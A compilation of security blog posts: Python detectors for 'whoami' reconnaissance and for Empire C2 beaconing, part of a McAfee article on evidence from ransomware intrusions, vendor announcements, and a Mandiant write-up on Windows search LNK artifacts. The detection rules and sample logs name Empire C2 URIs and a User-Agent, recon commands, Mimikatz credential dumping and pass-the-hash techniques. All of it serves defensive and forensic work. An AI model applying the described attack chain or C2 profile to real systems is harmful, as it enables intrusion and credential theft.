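# Constructed record format: <ts> host=<h> user=<u> image=<path> parent=<path> cmdline="<cmd>"
LINE_RE = re.compile(
    r'^(?P<ts>\S+)\s+host=(?P<host>\S+)\s+user=(?P<user>\S+)\s+'
    r'image=(?P<image>\S+)\s+parent=(?P<parent>\S+)\s+cmdline="(?P<cmdline>[^"]*)"$'
)


@dataclass(frozen=True)
class ProcessEvent:
    ts: str
    host: str
    user: str
    image: str
    parent: str
    cmdline: str


def parse_event(line: str) -> Optional[ProcessEvent]:
    """Parse one constructed process-creation record; malformed lines yield None."""
    m = LINE_RE.match(line.strip())
    return ProcessEvent(**m.groupdict()) if m else None


def basename(path: str) -> str:
    """Last path component, lower-cased, tolerating both separators."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(ev: ProcessEvent) -> Optional[dict]:
    """Score a whoami execution; returns an alert dict or None when nothing is suspicious.

    A plain `whoami` typed into cmd.exe on an ordinary workstation is something helpdesk
    and admin staff do legitimately, so it is only logged, not alerted on."""
    if basename(ev.image) != "whoami.exe":
        return None
    score, reasons = 0, []
    if ev.host in EXEC_ASSETS:            # the rule the article recommends
        score += 4
        reasons.append("whoami executed on an executive asset")
    if "/all" in ev.cmdline.lower():      # /all enumerates groups and privileges
        score += 1
        reasons.append("whoami /all enumerates group membership and privileges")
    if basename(ev.parent) in SCRIPT_HOSTS:
        score += 2
        reasons.append(f"launched from scripting host {basename(ev.parent)}")
    if score < 2:
        return None
    return {
        "ts": ev.ts, "host": ev.host, "user": ev.user,
        "severity": "high" if score >= 4 else "medium",
        "reasons": reasons,
    }


def run_detection(lines: List[str]) -> List[dict]:
    """Run the rule over a batch of log lines and return the alerts in input order."""
    alerts = []
    for line in lines:
        ev = parse_event(line)
        if ev is not None:
            alert = evaluate(ev)
            if alert is not None:
                alerts.append(alert)
    return alerts


# Constructed sample batch: an Empire-style recon on the CEO's laptop, a legitimate
# helpdesk check, a scripted whoami on a sales workstation, and one unrelated process.
SAMPLE_EVENTS = r"""
2020-02-20T09:12:01Z host=LT-CEO-01 user=CORP\jdoe image=C:\Windows\System32\whoami.exe parent=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe cmdline="whoami /all"
2020-02-20T09:14:22Z host=WS-HELPDESK-07 user=CORP\svc_hd image=C:\Windows\System32\whoami.exe parent=C:\Windows\System32\cmd.exe cmdline="whoami"
2020-02-20T09:20:05Z host=WS-SALES-22 user=CORP\asmith image=C:\Windows\System32\whoami.exe parent=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe cmdline="whoami /all"
2020-02-20T09:21:40Z host=LT-CFO-02 user=CORP\mlee image=C:\Windows\System32\notepad.exe parent=C:\Windows\explorer.exe cmdline="notepad.exe budget.txt"
""".strip().splitlines()

if __name__ == "__main__":
    for alert in run_detection(SAMPLE_EVENTS):
        print(alert)
```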

In the context of targeted ransomware attacks, the attacker preferably wants to have local admin, domain admin and/or SYSTEM rights. Those will be the keys to the kingdom and open all gates.

In the next step, we mostly observe some variant of Mimikatz or another password-dumping tool that dumps the credentials from a machine. Either Mimikatz is compiled in various formats, or it is part of a remote PowerShell toolkit like Empire:

Figure 2 Empire Mimikatz (source powershellempire.com)

We began this article series with the fact that every touch of a system leaves digital footprints behind. In this example with Empire, the following is happening:

  • Attacker has a connection to a system through the use of a ‘launcher’ script
  • Attacker is using a C2 (command and control) to interact
  • Attacker is using PowerShell to execute commands

From a MITRE ATT&CK Techniques perspective we would look at this overview of techniques and interaction:

Figure 3 Attacker using Empire

Which stages and evidence sources will create visibility and early warning indicators?

For PowerShell usage there are several digital evidence locations available. Besides traces in memory, traces can be discovered in the Windows Event logs, the Registry, and on the file system (for example the Prefetch directory), and there is even a PowerShell command history file if PowerShell v5 or above is used. That file can be found at:

C:\Users\<username>\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

Empire by design encrypts its communications, makes infrequent and randomized connections and, last but not least, mimics ordinary HTTP activity to stay hidden in the ‘normal’ traffic. If we look at the order of volatility from our first article, network traffic changes within seconds to minutes, giving us a very short window unless we do full packet capture and inspection of our network traffic.

The network activity might be challenging to notice; however, there are indicators that can help identify possible Empire traffic. To set up the C2 traffic, the attacker needs to configure a ‘listener’ that contains all the settings for the C2 traffic interaction.

Figure 4 Empire Listener setup

In the partial setup screen in Figure 4, we see three URIs being configured that will be frequently requested, combined with an HTTP header. A combination detection of the three URIs being polled within a given timeframe, combined with the HTTP header, could be a very good network indicator to detect Empire C2 traffic. As a responder, when you detect these indicators, look back at Figure 3 and start hunting backwards. You discovered the C2 activity, which means the hosts interacting with the C2 have PowerShell activity, and it is time to secure your evidence. This is how I like to apply the MITRE ATT&CK model: understand what you just discovered and its implications, then hunt for evidence or anticipate the attacker’s next step and act.

Keep in mind this is a default setup and can be changed by the attacker. Experience suggests that cyber-crime motivated actors are in a hurry for the cash and use a default installation of tools, whereas nation-state cyber-espionage operations customize their tooling since they want to operate longer in a victim’s network.
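The combination detection described above, as an added example that is not part of the McAfee article: a sliding-window rule that alerts when one client polls all three listener URIs with the listener's HTTP header inside a short timeframe. Figure 4 is not reproduced here, so the three URIs and the User-Agent value are taken from the original Empire default listener profile and should be treated as an assumption, as should the 600-second window; the proxy log lines are constructed.

```python
"""Network-side detection of the Empire listener pattern (added example, not the
article's own code). Proxy log lines are constructed; the profile values are assumed."""
import re
from collections import defaultdict, deque
from datetime import datetime, timezone
from typing import Dict, Iterable, List, Set

# Assumed default Empire HTTP listener profile: three request URIs plus the header they
# are sent with. Attackers can change these, so treat the values as tunable, not fixed.
EMPIRE_URIS: Set[str] = {"/admin/get.php", "/news.php", "/login/process.php"}
EMPIRE_UA = "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
WINDOW_SECONDS = 600  # the article's "x timeframe"; chosen here as an assumption

# Constructed proxy log format: <utc ts> <src ip> <dst ip> <method> <uri> "<user-agent>"
LINE_RE = re.compile(
    r'^(?P<ts>\S+)\s+(?P<src>\S+)\s+(?P<dst>\S+)\s+(?P<method>[A-Z]+)\s+'
    r'(?P<uri>\S+)\s+"(?P<ua>[^"]*)"$'
)


def parse_line(line: str):
    """Parse one proxy record into a dict, or None for blank/malformed lines."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
    rec["uri"] = rec["uri"].split("?", 1)[0]  # compare the path only, ignore query strings
    return rec


def detect_empire_c2(lines: Iterable[str], uris: Set[str] = EMPIRE_URIS,
                     ua: str = EMPIRE_UA, window: int = WINDOW_SECONDS) -> List[Dict]:
    """Alert once per (src, dst) pair that requests every profile URI with the profile
    header inside a sliding window of `window` seconds. Lines must be in time order.

    Any single URI alone is weak evidence (plenty of sites have a /news.php); it is the
    combination of all three, with the matching header, in a short period that is the
    indicator the article describes."""
    recent: Dict[tuple, deque] = defaultdict(deque)  # (src, dst) -> (ts, uri) in window
    alerted: Set[tuple] = set()
    alerts: List[Dict] = []
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["ua"] != ua or rec["uri"] not in uris:
            continue
        key = (rec["src"], rec["dst"])
        q = recent[key]
        q.append((rec["ts"], rec["uri"]))
        while q and (rec["ts"] - q[0][0]).total_seconds() > window:
            q.popleft()                       # expire requests that fell out of the window
        if key not in alerted and {u for _, u in q} == uris:
            alerted.add(key)
            alerts.append({
                "src": key[0], "dst": key[1],
                "first_seen": q[0][0].isoformat(), "last_seen": rec["ts"].isoformat(),
                "requests": len(q),
                "reason": "all profile URIs polled with profile User-Agent within window",
            })
    return alerts


# Constructed sample: 10.1.5.23 beacons to 203.0.113.10 with the full pattern; 10.1.5.40
# browses a normal /news.php with a browser UA; 10.1.5.77 hits all three URIs but hours
# apart, so the window rule does not fire for it.
SAMPLE_PROXY_LOG = """
2020-02-20T10:00:00Z 10.1.5.23 203.0.113.10 GET /admin/get.php "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
2020-02-20T10:00:12Z 10.1.5.40 198.51.100.7 GET /news.php "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/80.0 Safari/537.36"
2020-02-20T10:00:45Z 10.1.5.23 203.0.113.10 POST /news.php "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
2020-02-20T10:01:33Z 10.1.5.23 203.0.113.10 POST /login/process.php "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
2020-02-20T10:03:10Z 10.1.5.23 203.0.113.10 GET /admin/get.php "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
2020-02-20T11:00:00Z 10.1.5.77 203.0.113.44 GET /admin/get.php "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
2020-02-20T11:30:00Z 10.1.5.77 203.0.113.44 POST /news.php "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
2020-02-20T12:15:00Z 10.1.5.77 203.0.113.44 POST /login/process.php "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
""".strip().splitlines()

if __name__ == "__main__":
    for alert in detect_empire_c2(SAMPLE_PROXY_LOG):
        print(alert)
```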

Now back to our scenario. The attacker has acquired the right privileges and has laterally moved through the network to have an idea how large it is and have possibly identified critical assets — they love shared folders with a lot of data in them.

The attacker will next prepare a custom version of the ransomware and could have tested it on underground AV-testing services to make sure that it will be fully undetectable (FUD). Depending on skills and capabilities, the ransomware will either be uploaded to the victim’s network or distributed and executed over the network using scripts. We have observed cases where a series of .bat scripts were used and where the payload was downloaded from Pastebin and executed by PowerShell on hosts – enough variety and options. Once executed, the first calls will come into the Helpdesk reporting the ransom notes.

A lot of the above techniques are available within post exploitation frameworks, of which there are several options that attackers can choose from. With any of these, the tool is only a conduit and we should always focus on detecting techniques rather than implementation specifics. Available options come in the form of both underground toolkits and penetration test tools designed to build awareness around the attacks. Unfortunately, those designed as security tools may also be used for nefarious purposes. This ‘chicken and egg’ situation is often the cause of heated debate since on one hand the tools can streamline attack scenarios, while on the other, without having them available to defenders, adequate testing of precautions is impossible.

Empire was mentioned above. This excellent PowerShell-based post-exploitation framework is no longer maintained or supported by its authors. Although forks exist, traction has slowed, but its use is still detected. Cobalt Strike, a commercial adversary simulation platform regularly used by red teams to test infrastructural security measures and detection capacity, is increasingly being adopted by criminal actors. Although its license is strictly controlled, pirated and cracked trial versions are available in the criminal underworld. Cobalt Strike is updated regularly to include the latest techniques and tools such as Mimikatz, while allowing a lot of flexibility for the addition of new and unique attack and bypass techniques. This can increase the likelihood of success, even on the most recent operating system versions.

Threat groups distributing GoGalocker, MegaCortex and Maze ransomware have been observed utilizing Cobalt Strike. At this stage in our scenario, with a foothold on the network, Cobalt Strike provides many options which can be used to complete their objective. These include T1075 Pass the Hash, T1097 Pass the Ticket, T1105 Remote File Copy, T1021 Remote Services and the old reliable: T1077 Windows Admin Shares.

As detailed in part 1, this evidence remains on a system for differing time spans. By studying previous attacks, we can see a general mode of operation and a sequence in which these techniques are executed. This can help guide us when choosing the timing and methods of evidence collection.

Detection of these attacks is not an easy task. Exploitation frameworks are often open source, in which case the attacker can modify code to manipulate IOCs (indicators of compromise). Alternatively, and as is the case for our example, Cobalt Strike, the framework provides specific configuration around the final form of binary droppers, network traffic format, timing, specific parameters, etc. Therefore, generic signatures will only detect the most basic of attacks and, as previously mentioned, focusing on techniques and behaviors rather than tools becomes critical. Creating a generic Cobalt Strike detection may miss the point of its existence – education around malicious techniques and behaviors. However, we can learn a lot about various indicator categories that can be monitored for functional outliers and unusual behaviors and, where the tool is merged into malware strains, the markers for that specific instance can often become specific IOCs.

In a lot of cases, understanding normal system behavior is crucial for uncovering outliers and having a baseline system for comparison can aid the analysis.

A few examples of these include:

  • Memory
    • The holy grail. Binary droppers may be modified to mask their true intentions; however, in memory they are visible in decoded form.
    • Search for markers of functionality such as suspicious system calls or reads/writes of sensitive system locations (e.g. lsass memory).
  • Running Processes
    • Similarly, running processes can be very revealing.
    • Although process ‘migration’ is often carried out, review for abnormal process hierarchies.
    • Does the process carry out functionality that is not expected? E.g. does notepad make http requests to an external domain?
  • Network Traffic
    • Domains should match known-good.
    • Spikes or regular timing patterns in traffic type or to specific servers.
    • Variables used in unusual manner, e.g. http headers including encoded binary data.
  • Disk
    • Binary and configuration files available for reverse engineering.
    • This static analysis is not as powerful as dynamic, running software.
    • Debugging a malicious binary may help but beware of sandbox/debugger detection.
  • Backup / Log Files
    • Never fully trust log files, as attackers can easily falsify them. External sources, e.g. syslog going to an external database, can improve the reliability of log data if available.
    • Search for specific markers for malicious activity. Some useful items to include: command line logs, PowerShell script block logging, specific logs for network applications such as web servers, service installation, share accessed – particularly C$, process launch, account login.

As we highlighted in these two articles, targeted ransomware attacks have increased massively over the past 8 months: targeting MSPs to hit many victims at the same time, victims running critical operations, public services, etc. Many of them use a similar blueprint, as we have tried to highlight.

Learn from the articles: identify which technology can give you that visibility, which digital evidence sources you have, and whether you can detect fast enough to preserve evidence and respond. If the ‘initial access stage’ is passed, where can you pick up in your line of defense and stop the threat?

Stay tuned for part 3, where we discuss technical controls that are available to help your organization to react to these early warning signs within an acceptable timeframe.

The post CSI: Evidence Indicators for Targeted Ransomware Attacks – Part II appeared first on McAfee Blogs.

Stay Sharp and Squash Security Debt with Veracode’s Security Labs

“Tell me and I forget. Teach me and I remember. Involve me and I learn.” This renowned quote from Benjamin Franklin is a powerful mantra for refining skills in any craft, coding included.

When it comes to developer training, nothing beats hands-on experience with real code customizable to the way a business runs. That’s why we’re excited to announce our new online training platform, Veracode Security Labs, crafted for developers and organizations eager to learn best practices in modern application security, deliver code on time, and reduce security debt. Whether developers lack the time for training or simply want to stay sharp, Security Labs empowers them to learn and grow backed by application security.

It isn’t a simulated experience; developers can log into the program to access a real application in a contained environment. From there, they learn how to exploit that application and practice fixing vulnerabilities with exercises on modern web applications, in their preferred languages, for a tailored and comprehensive hands-on training that helps them establish best practices. Ben Franklin would be proud.

Fast and effective learning

When a breach hits, employees can find themselves in a mad dash to patch security holes and remediate damage. Being prepared is all about incorporating security-minded processes earlier in the development cycle to avoid such headaches down the road. The interactive Security Labs experience ensures developers leave the training module ready to hit the ground running with fresh new skills that help them not only fix flaws quickly, but also write better code.

“The future of AppSec depends on enabling developers to create more secure code from the start,” says Fletcher Heisler, Veracode’s Director of Developer Enablement and one of the minds behind Security Labs. Using Security Labs to directly exploit and patch real code means developers can begin improving in just 10 minutes.

“Through this hands-on practice, developers gain practical AppSec skills that can be applied immediately,” Fletcher explains. “For Veracode customers, this means more secure code, less time spent on security debt, and developers who are overall more engaged in supporting security.”

Through progress reporting, email assignments, and a leaderboard, teams of developers feel inspired by each other to advance their secure coding skillsets. Managers can set required modules and deadlines too, with tools for tracking team completion and exporting progress reports so that they have results in hand to prove capability and compliance.

Best practices and beyond

Veracode Security Labs isn’t solely about preparing developers to tackle vulnerabilities and stay on top of compliance. At its core, this training platform bridges the gap between development and security to empower organizations with the tools they need to keep AppSec at the forefront of their operations. And with the average cost per data breach incident hitting 3.29 million in 2019, staying sharp can save money and bandwidth in the long run.

“It’s so much more costly, in terms of both dollars and time, to fix a security flaw once it has already made its way into production code,” says Fletcher. “Meanwhile, security teams can’t scale to the time and expertise required to review every line of code from every developer. If developers have the foundational training to write secure code from the very start, an organization will be able to deliver — and continue to deliver — applications and features on time without getting bogged down in security debt.”

Practical lessons from this hands-on program can help an organization from the ground up. And when paired with Veracode’s Static Analysis IDE Scan solution to quickly identify and remediate flaws at scale, development teams have every opportunity for risk reduction at their fingertips.

Interested in trying it out? You can find more information about Security Labs here, and request a demo to see how this solution can benefit your organization.

M-Trends 2020: Insights From the Front Lines

Today we release M-Trends 2020, the 11th edition of our popular annual FireEye Mandiant report. This latest M-Trends contains all of the statistics, trends, case studies and hardening recommendations that readers have come to expect through the years—and more.

One of the most exciting takeaways from this year’s report: the global median dwell time is now 56 days. That means the average attacker is going undetected on a network for under two months—an M-Trends first. This is a very promising statistic that demonstrates how far we’ve come since 2011 when the global median dwell time was 416 days. And yet, we know a sophisticated attacker needs only a few days to gain access to the crown jewels, so there is still plenty of room for improvement.

Another interesting statistic in the report is what we refer to as "detection by source." For the first time since 2015, the majority of organizations are being notified of compromises by external sources (53 percent) over internal teams (47 percent). This is more likely due to factors such as increases in law enforcement notifications and compliance changes, and less likely due to internal teams having lost a step.

There’s a whole lot more to look forward to in M-Trends 2020, including:

  • By the Numbers: Global median dwell time and detection by source are just the tip of the iceberg—we share a number of other statistics related to targeted industries, malware, threat techniques and more.
  • Newly Named APT Groups: Learn all about APT41, a group responsible for carrying out Chinese state-sponsored espionage and financially motivated activity since as far back as 2012.
  • Trends: We take a deep dive into the latest trends involving malware families, monetizing ransomware, crimeware as a service, and malicious insiders.
  • Case Studies: With so many organizations moving to the cloud, we take a look at a breach involving cloud assets. We also take readers through a campaign where attackers were targeting gift cards.

While M-Trends 2020 contains plenty of new information, the goal of M-Trends has remained the same since the beginning: to arm security professionals with details on the latest attacks and threats we are seeing during our engagements.

Download the 11th edition of M-Trends today.

NICE Webinar: The Intersection of the Privacy and Cybersecurity Workforce

The PowerPoint slides used during this webinar can be downloaded here.

Speakers:
Katie Boeckl, Privacy Risk Strategist, National Institute of Standards and Technology (NIST)
Caitlin Fennessy, Research Director, International Association of Privacy Professionals
Jonathan Fox, Director, Privacy Engineering, Chief Privacy Office, Cisco

Synopsis: With the rise of a more digitally connected society, the intersection between privacy and cybersecurity grows closer. The NICE Cybersecurity Workforce Framework includes a few components covering privacy, including a work role for Privacy Officer/Privacy

The Missing LNK — Correlating User Search LNK files

Forensic investigators use LNK shortcut files to recover metadata about recently accessed files, including files deleted after the time of access. In a recent investigation, FireEye Mandiant encountered LNK files that indicated an attacker accessed files included in Windows Explorer search results. In our experience, this was a new combination of forensic artifacts. We’re excited to share our findings because they help to paint a more complete picture of an attacker’s actions and objectives on targeted systems. Further, these findings can also be leveraged for insider threat cases to determine the path used to locate and subsequently open a file.

Windows LNK Format

The .lnk extension is associated with a class of files known as Shell Items. These binary format files contain information that can be used to access other data objects in the Windows shell (the graphical user interface).

LNK shortcut files are one type of Shell Item. They are created automatically by the Windows operating system when a user accesses a file from a supported application, but can also be created manually by the user. LNK shortcut files typically contain metadata about the accessed file, including the file name and size, the original path, timestamps, volume and system information (e.g. drive type and system hostname), and network information (e.g. network share path). Fortunately, there are tools available that can parse these files. While internally at Mandiant we leverage FireEye Endpoint Security to parse LNK files and identify suspicious user search terms, for the purposes of this blog post we will be using LECmd by Eric Zimmerman. Figure 1 shows the command line options for LECmd.exe.


Figure 1: LECmd.exe command line options

Parsed metadata within LNK shortcut files is relevant to forensic investigations for multiple use cases, including profiling user activity on a system or searching for references to malware that has since been deleted.

User Search LNK files

Recently, Mandiant encountered LNK files whose format we did not initially recognize. The files came from a Windows Server 2012 R2 system and had paths like those shown in Figure 2. We guessed that they were LNK shortcut files based on their extension and file path; however, their content was not familiar to us.

C:\Users\<user>\AppData\Roaming\Microsoft\Windows\Recent\passw.lnk

C:\Users\<user>\AppData\Roaming\Microsoft\Windows\Recent\gov.lnk

Figure 2: Full file path of the unfamiliar LNK files

In the previous examples, a forensic investigator would use the LNK shortcut filename to conclude that a user opened a file named passw or gov. Then, they would use a tool like LECmd to recover additional metadata. This would provide them with the full file path of the accessed file and the timestamps of the file at the time it was accessed - among other forensic information.

However, the previous LNK files did not reveal expected metadata. Figure 3 shows the output of LECmd for passw.lnk (some information omitted for clarity).

LECmd version 1.3.2.1

Author: Eric Zimmerman (saericzimmerman@gmail.com)
https://github.com/EricZimmerman/LECmd

--- Header ---
  Target created:
  Target modified:
  Target accessed:

  File size: 0
  Flags: HasTargetIdList, IsUnicode, DisableKnownFolderTracking
  File attributes: 0
  Icon index: 0
  Show window: SwNormal (Activates and displays the window. The window is restored to its original size and position if the window is minimized or maximized.)

--- Target ID information (Format: Type ==> Value) ---

  Absolute path: Search Folder\passw

  -Users property view ==> Search Folder
  >> Property store (Format: GUID\ID Description ==> Value)
     d5cdd505-2e9c-101b-9397-08002b2cf9ae\AutoList  ==> VT_STREAM not implemented (yet) See extension block section for contents for now
     d5cdd505-2e9c-101b-9397-08002b2cf9ae\AutolistCacheTime  ==> 1849138729510
     d5cdd505-2e9c-101b-9397-08002b2cf9ae\AutolistCacheKey  ==> Search Results in Local Disk (C:)0

  -Variable: Users property view ==> passw
  >> Property store (Format: GUID\ID Description ==> Value)
     1e3ee840-bc2b-476c-8237-2acd1a839b22\2      (Description not available)         ==> VT_STREAM not implemented
     1e3ee840-bc2b-476c-8237-2acd1a839b22\8      (Description not available)         ==> passw
     28636aa6-953d-11d2-b5d6-00c04fd918d0\11     Item Type                           ==> Stack
     28636aa6-953d-11d2-b5d6-00c04fd918d0\25     SFGAO Flags                         ==> 805306372
     b725f130-47ef-101a-a5f1-02608c9eebac\10     Item Name Display                   ==> passw

--- End Target ID information ---

--- Extra blocks information ---

>> Property store data block (Format: GUID\ID Description ==> Value)
   (Property store is empty)

Figure 3: LECmd.exe output for passw.lnk

Of note, none of the expected information for LNK shortcut files is present. However, there were strings of interest in the Target ID Information section including Search Folder\passw as well as Search Results in Local Disk (C:). For comparison, Figure 4 highlights output for a standard LNK shortcut file using a test file. Notice that the target file timestamps, file size, full file path, and other expected file metadata are present (some information omitted for clarity).

LECmd version 1.3.2.1

Author: Eric Zimmerman (saericzimmerman@gmail.com)
https://github.com/EricZimmerman/LECmd

--- Header ---
  Target created:  2020-01-21 19:34:28
  Target modified: 2020-01-21 19:34:28
  Target accessed: 2020-01-22 21:25:12

  File size: 4
  Flags: HasTargetIdList, HasLinkInfo, HasRelativePath, HasWorkingDir, IsUnicode, DisableKnownFolderTracking
  File attributes: FileAttributeArchive
  Icon index: 0
  Show window: SwNormal (Activates and displays the window. The window is restored to its original size and position if the window is minimized or maximized.)

Relative Path: ..\..\..\..\..\Desktop\test.txt
Working Directory: C:\Users\<username>\Desktop

--- Link information ---
Flags: VolumeIdAndLocalBasePath

>>Volume information
  Drive type: Fixed storage media (Hard drive)
  Serial number: <serial number>
  Label: OSDisk
  Local path: C:\Users\<username>\Desktop\test.txt

--- Target ID information (Format: Type ==> Value) ---
  Absolute path: My Computer\Desktop\test.txt

  -Root folder: GUID ==> My Computer

  -Root folder: GUID ==> Desktop

  -File ==> test.txt
    Short name: test.txt
    Modified: 2020-01-21 19:34:30
    Extension block count: 1

    --------- Block 0 (Beef0004) ---------
    Long name: test.txt
    Created: 2020-01-21 19:34:30
    Last access: 2020-01-21 19:34:32
    MFT entry/sequence #: 108919/8 (0x1A977/0x8)

--- End Target ID information ---

--- Extra blocks information ---

>> Tracker database block
   Machine ID: <hostname>
   MAC Address: <mac address>
   MAC Vendor: INTEL
   Creation: 2020-01-21 15:19:59

   Volume Droid: <volume>
   Volume Droid Birth: <volume>
   File Droid: <file>
   File Droid birth: <file>

Figure 4: LECmd.exe output for standard LNK shortcut file test.txt

Fortunately, during the investigation we also parsed the user’s NTUSER.DAT registry file (using Harlan Carvey’s RegRipper) and reviewed the WordWheelQuery key, which records the user’s Explorer search history. The passw.lnk file suddenly became more interesting! Figure 5 shows the entries parsed from the registry key. Note that the search history includes the same term we observed in the LNK file: passw.

wordwheelquery v.20100330
(NTUSER.DAT) Gets contents of user's WordWheelQuery key

Software\Microsoft\Windows\CurrentVersion\Explorer\WordWheelQuery
LastWrite Time Wed Nov 13 06:51:46 2019 (UTC)

 Searches listed in MRUListEx order

14   Secret
6    passw
13   ccc
12   bbb
11   aaa
10   *.cfg
9    apple
8    dni
7    private
4    gov
5    air
3    intelsat
2    adhealthcheck
1    *.ps1
0    global

Figure 5: WordWheelQuery key extracted from the user’s NTUSER.DAT registry file

Via the WordWheelQuery registry key, we identified passw as the second most recent term in the user’s Explorer search history according to the MRUListEx order. MRUListEx is a registry value that lists the order in which the other values under the key were most recently accessed—essentially, the order in which terms were searched in Explorer. passw also matched the filename of the unusual LNK file that contained the string Search Results in Local Disk (C:) (see Figure 3). These details suggested that LNK files were being created as a result of user Explorer searches. Therefore, we’ve started calling these “user search LNK files”.

Nuance and Interpretation

After searching the system for LNK files named after the terms listed in the user’s Explorer search history, we found that not all terms had associated user search LNK files. Figure 6 displays the LNK files we identified as a result of this search, with their file creation and modification timestamps. Note that while we found 15 searches via the WordWheelQuery registry key, there are only four (4) user search LNK files.

2019-11-09 08:33:14    Created
2019-11-09 08:33:14    Modified
C:\Users\<user>\AppData\Roaming\Microsoft\Windows\Recent\gov.lnk

2019-11-09 09:29:11    Created
2019-11-09 09:29:37    Modified
C:\Users\<user>\AppData\Roaming\Microsoft\Windows\Recent\private.lnk

2019-11-09 08:38:29    Created
2019-11-13 06:47:56    Modified
C:\Users\<user>\AppData\Roaming\Microsoft\Windows\Recent\passw.lnk

2019-11-13 06:57:03    Created
2019-11-13 06:57:25    Modified
C:\Users\<user>\AppData\Roaming\Microsoft\Windows\Recent\Secret.lnk

Figure 6: LNK files with associated WordWheelQuery Explorer search terms

Additionally, we noticed pairs of LNK files created at the same time that had similar names. As an example, Figure 7 lists two LNK files that were both created at 2019-11-09 08:38:29 UTC.

C:\Users\<user>\AppData\Roaming\Microsoft\Windows\Recent\passw.lnk

C:\Users\<user>\AppData\Roaming\Microsoft\Windows\Recent\password.lnk

Figure 7: LNK files created at the same time

After further testing, we determined that the system created user search LNK files as a result of Explorer searches where the user opened one of the files produced as a result of this search. User search LNK files were not created if the user did not open a file returned by the search.

In this example, the password.lnk file contained target file metadata, as would be expected for LNK shortcut files, and referenced a target file named password.txt located in the T:\ directory. passw.lnk, as previously discussed, only contained expected metadata for a user search LNK file, including the absolute path Search Folder\passw with reference to Search Results in Local Disk (C:). However, this discrepancy in directory—the user search LNK file search context of Search Results in Local Disk (C:) and the LNK shortcut file located in the T:\ drive—is actually as expected.

LNK shortcut files contain metadata for the most recently accessed file, and we found the same to be true for user search LNK files. Based on differing creation and modification timestamps for passw.lnk, we know the user searched for passw in at least one other instance (we’re not able to conclude whether a search happened between these two points in time) and opened a file from the search results. This is seen in the timestamps for the passw user search LNK file in Figure 8.

2019-11-09 08:38:29    Created
2019-11-13 06:47:56    Modified
C:\Users\<user>\AppData\Roaming\Microsoft\Windows\Recent\passw.lnk

Figure 8: passw.lnk creation and modification timestamps

The second occurrence of a search for passw occurred on November 13, 2019. In this instance, the user again searched for the term passw using Windows Explorer search, but this time searched within the context of the C:\ drive (Search Results in Local Disk (C:)), and subsequently clicked on a document named password2.txt. The results from LECmd for password2.lnk can be seen in Figure 9 (some information omitted for clarity and to protect client information). Notice that the information embedded in user search LNK files is also embedded within the LNK shortcut file that is created simultaneously with the user search LNK file (the Search Folder and passw property views in the Target ID information section). The search context for passw.lnk and the full file path location for password2.lnk both match: C:\.

LECmd version 1.3.2.1

Author: Eric Zimmerman (saericzimmerman@gmail.com)
https://github.com/EricZimmerman/LECmd

--- Header ---
  Target created:  2015-11-09 22:14:10
  Target modified: 2010-01-11 16:57:11
  Target accessed: 2015-11-09 22:14:10

  File size: 19
  Flags: HasTargetIdList, HasLinkInfo, HasRelativePath, HasWorkingDir, IsUnicode, DisableKnownFolderTracking
  File attributes: FileAttributeArchive
  Icon index: 0
  Show window: SwNormal (Activates and displays the window. The window is restored to its original size and position if the window is minimized or maximized.)

Relative Path: ..\..\..\..\..\..\..\<file path>\password2.txt
Working Directory: C:\<file path>

--- Link information ---
Flags: VolumeIdAndLocalBasePath, CommonNetworkRelativeLinkAndPathSuffix

>>Volume information
  Drive type: Fixed storage media (Hard drive)
  Serial number: <serial number>
  Label: (No label)

  Network share information
    Share name: \\<hostname>\<top level folder>
    Provider type: <provider type>
    Share flags: ValidNetType

  Local path: C:\<top level folder>\
  Common path: <file path>\password2.txt

--- Target ID information (Format: Type ==> Value) ---

  Absolute path: Search Folder\passw\password2

  -Users property view ==> Search Folder
  >> Property store (Format: GUID\ID Description ==> Value)
      d5cdd505-2e9c-101b-9397-08002b2cf9ae\AutoList  ==> VT_STREAM not implemented (yet) See extension block section for contents for now
      d5cdd505-2e9c-101b-9397-08002b2cf9ae\AutolistCacheTime  ==> 1849138729510
      d5cdd505-2e9c-101b-9397-08002b2cf9ae\AutolistCacheKey  ==> Search Results in Local Disk (C:)0

  -Variable: Users property view ==> passw
  >> Property store (Format: GUID\ID Description ==> Value)
      1e3ee840-bc2b-476c-8237-2acd1a839b22\2      (Description not available)         ==> VT_STREAM not implemented
      1e3ee840-bc2b-476c-8237-2acd1a839b22\8      (Description not available)         ==> passw
      28636aa6-953d-11d2-b5d6-00c04fd918d0\11     Item Type                           ==> Stack
      28636aa6-953d-11d2-b5d6-00c04fd918d0\25     SFGAO Flags                         ==> 805306372
      b725f130-47ef-101a-a5f1-02608c9eebac\10     Item Name Display                   ==> passw

  -Variable: Users property view ==> password2
  >> Property store (Format: GUID\ID Description ==> Value)
     49691c90-7e17-101a-a91c-08002b2ecda9\3      Search Rank                         ==> 0
     28636aa6-953d-11d2-b5d6-00c04fd918d0\25     SFGAO Flags                         ==> 1077936503
     28636aa6-953d-11d2-b5d6-00c04fd918d0\32     Delegate ID List                    ==> VT_VECTOR data not implemented (yet) See extension block section for contents for now
     28636aa6-953d-11d2-b5d6-00c04fd918d0\11     Item Type                           ==> .txt
     28636aa6-953d-11d2-b5d6-00c04fd918d0\24     Parsing Name                        ==> password2.txt
     446d16b1-8dad-4870-a748-402ea43d788c\100    Thumbnail Cache Id                  ==> 7524032674880659487
